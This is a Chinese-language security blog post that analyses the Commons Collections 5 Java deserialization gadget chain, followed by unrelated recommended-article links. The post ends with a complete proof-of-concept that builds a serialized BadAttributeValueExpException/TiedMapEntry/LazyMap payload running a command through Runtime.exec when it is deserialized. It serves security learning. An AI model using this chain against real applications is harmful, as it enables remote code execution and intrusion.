[Java反序列化]—CommonsCollections5

最新推荐文章于 2023-12-07 12:00:00 发布
最新推荐文章于 2023-12-07 12:00:00 发布
阅读量348 收藏
点赞数
分类专栏: JAVA安全 文章标签: java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/snowlyzz/article/details/128091213
版权

先贴张其他师傅的图

其实 CC5就是CC1的一种变形,前半段改修一下,后面接上就是CC5了。CC1是通过AnnotationInvocationHandler.invoke()获取get(),而CC5则是通过TiedMapEntry.toString(),其余部分都是一样的

分析

看看TiedMapEntry如何调用的 get 方法

public String toString() {
    return getKey() + "=" + getValue();
}

getValue 中调用了 get()

public Object getValue() {
    return map.get(key);
}

这里可以用构造器修改map的值,就可以接上后面的部分

public TiedMapEntry(Map map, Object key) {
    super();
    this.map = map;
    this.key = key;
}

再来看看哪里调用的toString()

全局搜索,在在BadAttributeValueExpException类中的readObject()中发现调用

private void readObject(ObjectInputStream ois) throws IOException, ClassNotFoundException {
    ObjectInputStream.GetField gf = ois.readFields();
    Object valObj = gf.get("val", null);

    if (valObj == null) {
        val = null;
    } else if (valObj instanceof String) {
        val= valObj;
    } else if (System.getSecurityManager() == null
            || valObj instanceof Long
            || valObj instanceof Integer
            || valObj instanceof Float
            || valObj instanceof Double
            || valObj instanceof Byte
            || valObj instanceof Short
            || valObj instanceof Boolean) {
        val = valObj.toString();
    } else { // the serialized object is from a version without JDK-8019292 fix
        val = System.identityHashCode(valObj) + "@" + valObj.getClass().getName();
    }
}

val = valObj.toString();

调用的是valObj .toString(), 所以我们要构造valObj为 TiedMapEntry类,看一下valObj的定义:

ObjectInputStream.GetField gf = ois.readFields();
Object valObj = gf.get("val", null);

先调用readFields从流中读取了所有的持久化字段,然后调用get()方法得到了名字是val的字段。

所以可以通过修改val的值,来修改valobj,而val是本类中的一个私有属性,直接反射修改即可

private Object val;

链子就清晰了,构造

BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);

这里实例化这个对象,需要传值 NUll,因为在他的构造方法中 有个

public BadAttributeValueExpException (Object val) {
    this.val = val == null ? null : val.toString();
}

如果传值为null ,则赋值null给var,如果val有值,则会直接调用toString,提前出发我们反序列化。

接着通过反射 修改val的值为 TiedMapEntry 类就可以了

最终poc

package CommonsCollections5;

import javax.management.BadAttributeValueExpException;
import org.apache.commons.collections.keyvalue.TiedMapEntry;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;

import java.io.*;
import java.lang.reflect.*;
import java.util.HashMap;
import java.util.Map;

public class cc5 {
    public static void main(String[] args) throws ClassNotFoundException, InvocationTargetException, InstantiationException, IllegalAccessException, NoSuchMethodException, IOException, NoSuchFieldException {
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", new Class[]{}}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[]{}}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
        Map innerMap = new HashMap();

        Map outerMap = LazyMap.decorate(innerMap,chainedTransformer);

        BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
        TiedMapEntry tiedMapEntry = new TiedMapEntry(outerMap,"snowyf");
        Class<BadAttributeValueExpException> badAttributeValueExpExceptionClass = BadAttributeValueExpException.class;
        Field val = badAttributeValueExpExceptionClass.getDeclaredField("val");
        val.setAccessible(true);
        val.set(badAttributeValueExpException,tiedMapEntry);

        serialize(badAttributeValueExpException);
        unserialize("1.txt");

    }


    public static void serialize(Object obj) throws IOException {
        ObjectOutputStream out = new ObjectOutputStream(new FileOutputStream("1.txt"));
        out.writeObject(obj);
    }


    public static Object unserialize(String Filename) throws IOException, ClassNotFoundException{
        ObjectInputStream In = new ObjectInputStream(new FileInputStream(Filename));
        Object o = In.readObject();
        return o;
    }
}

snowlyzz
关注
专栏目录
Java反序列化和JNDI注入漏洞案例实战
悦分享
08-04 996
CORBA全称(Common ObjectRequest Broker Architecture)也就是公共对象请求代理体系结构,是OMG(对象管理组织,一个非盈利性的计算机行业标准协会)制定的一种标准的面向对象应用程序体系规范。其提出是为了解决不同应用程序间的通信,曾是分布式计算的主流技术。CORBA标准主要分为三个部分,IDL(接口语言)、ORB(对象请求代理)、IIOP(ORB之间的操作协议)。其结构主要分为三部分:naming service、client side、servant side。...
commons-collections
04-23
collections jar 包集合,使用Maven的可以直接使用!collections
Java安全—CommonsCollections5
XINO
08-17 592
今天给大家带来的是CC5链的构造分析,也是基本按照CC1走下来的,只是后面的部分不太一样。希望大家有所收获。
java--CommonsCollections5学习
zyer
05-30 262
cc5和cc6差不多,主要都是利用TideMapEntry从而利用LazyMap调用get方法,而LazyMap的get方法需要的参数是LazyMap中没有的值才会触发LazyMap的transform的put方法。 TiedMapEntry 主要使用的是LazyMap的get方法,那么在这里我们可以看到其中getValue,hashCode,equals,toString都可以触发 那么下面我们需要寻找一个可以输入TideMapEntry这个类,并且可以触发这些函数之一的一个类。 BadAtt
CommonsCollections5分析
笑花大王
01-02 401
CommonsCollections5 调用链 BadAttributeValueExpException.readObject() | TiedMapEntry.toString() | LazyMap.get() | ChainedTransformer.transform() | ConstantTransformer.transform() | ...
JAVA反序列化之CommonCollections1利用链
lt_xiaodou的博客
08-30 352
看到这里,是否有一种豁然开朗的感觉?到这里相信大家对上面的Demo原理已经了解了,但是现在有一个问题,我们在本机执行是可以执行代码了,但是怎么反序列化漏洞中来利用这个利用链呢?通过上面的调用链总结可以看出,这一套调用链主要是围绕着Transformer接口的transform方法的,所以说要找到一个在readObject方法中能调用transform方法的地方。整篇文章总体思路是跟着P牛的文章思路来的,只不过因为基础薄弱很多地方都详细分析了一遍。...
漫谈Commons-Collections反序列化
热门推荐
Summer's blog
06-02 1万+
Java组件Commons-Collections被广泛用于各大系统中,在几年前的被爆出反序列化漏洞,从此打开了Java安全的大门。全网最易懂的反序列化分析文章,花了大量的流程图帮助理解。
java安全 反序列化(二)
sechelper的博客
12-07 611
java反射,CC6链源码分析,LazyMap利用连,ysoserial工具
ysomap:一个基于ysererial的有用的Java反序列化利用框架
05-14
所以萌生了开发一个更加灵活的框架来扩展反序列化利用链,也就是当前这个试验品ysomap。 PS:YSOMAP项目为另一个项目的子项目,后续将开源该项目,敬请期待...... #2 原理 我将利用链切分成了两个部分payload和
java反序列化漏洞修复_【修复总结】JAVA反序列化
weixin_36413157的博客
03-08 2805
威胁说明如果Java应用对用户输入,即不可信数据做了反序列化处理,那么攻击者可以通过构造恶意输入,让反序列化产生非预期的对象,非预期的对象在产生过程中就有可能带来任意代码执行。问题原因类ObjectInputStream在反序列化时,没有对生成的对象的输入做限制,使攻击者利用反射调用函数进行任意命令执行。CommonsCollections组件中对于集合的操作存在可以进行反射调用的方法问题根源Ap...
Java安全之Commons Collections5
最新发布
星星我啊,已经很努力在学习了, 有人一起学习吗?Ziansec-1
12-07 622
【代码】Java安全之Commons Collections5。
Java代码审计——Commons Collections5 BadAttributeValueExpException
王嘟嘟的博客
12-02 1225
0x00 前言 反序列化总纲 cc链无非就是不同的调用拼接在一起形成的,比如cc5就是在cc1的基础上进行调用调整的。 0x01 BadAttributeValueExpException 在LazyMap的基础上,发现了一个新的调用方式,就是通过 TiedMapEntry+BadAttributeValueExpException的方式进行调用的。 在之前,我们知道LazyMap需要调用get方法才可以触发,那么我们的主题就是如果去触发LazyMap的get方法。 1.TiedMapEntry 首先来看这
[JAVA反序列化初学3]Commons-Collections5利用链分析
GX233的博客
03-24 5162
[JAVA反序列化]Commons-Collections5利用链分析
Java安全--CC5
qq_64201116的博客
12-21 483
再往后一路都比较熟悉就不说了。
CommonCollections5链分析
Demodd的博客
03-20 4687
前言 ​ 本文直接跟着前面文章写了,没有描述前部分poc的内容 正文 看一下cc5的Gadget Gadget chain: ObjectInputStream.readObject() BadAttributeValueExpException.readObject() TiedMapEntry.toString() LazyMap.get() Chaine
Java反序列化(七)Common Collection 5分析
Vicl1fe的博客
06-04 332
前言 环境 jdk1.7 Commons Collections 3.1 <dependency> <groupId>commons-collections</groupId> <artifactId>commons-collections</artifactId> <version>3.1</version> </dependency> 利用链 Objec
Java安全学习笔记--反序列化漏洞利用链CC5
m0_64685672的博客
01-22 1239
测试环境 jdk1.8(jdk8u71) Commons Collections4.0 在jdk1.8的时候Annotationinvocation的readObject方法被改写,cc1链就不适用了,cc5链是基于Lazymap类在jdk1.8使用TiedMapEntry+BadAttributeValueExpException来触发LazyMap的get方法。CC1LazyMap链 利用链核心 Transformer[] transformers=new Transforme.
odbc 函数序列错误_Java反序列化利用链分析之CommonsCollections5,6,7,9,10
weixin_39600331的博客
11-29 299
0x00 前言本文继续分析CommonsCollections:3.1的相关反序列化利用链,这次主要分析CommonsCollections5,6,7,9,以及我找的一个新利用链,这里暂且将其称为10.0x01 环境准备CommonsCollections5,6,7,10用的还是commons-collections:3.1,jdk用7或8都可以。CommonsCollections...
Java安全:深入解析反序列化漏洞
"本文是关于Java安全的系列文章,主要探讨反序列化相关的安全问题。" 在Java编程中,反序列化是一个将字节流转换回对象的过程,这在处理网络通信、持久化存储等场景中非常常见。然而,不恰当的反序列化处理可能导致...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值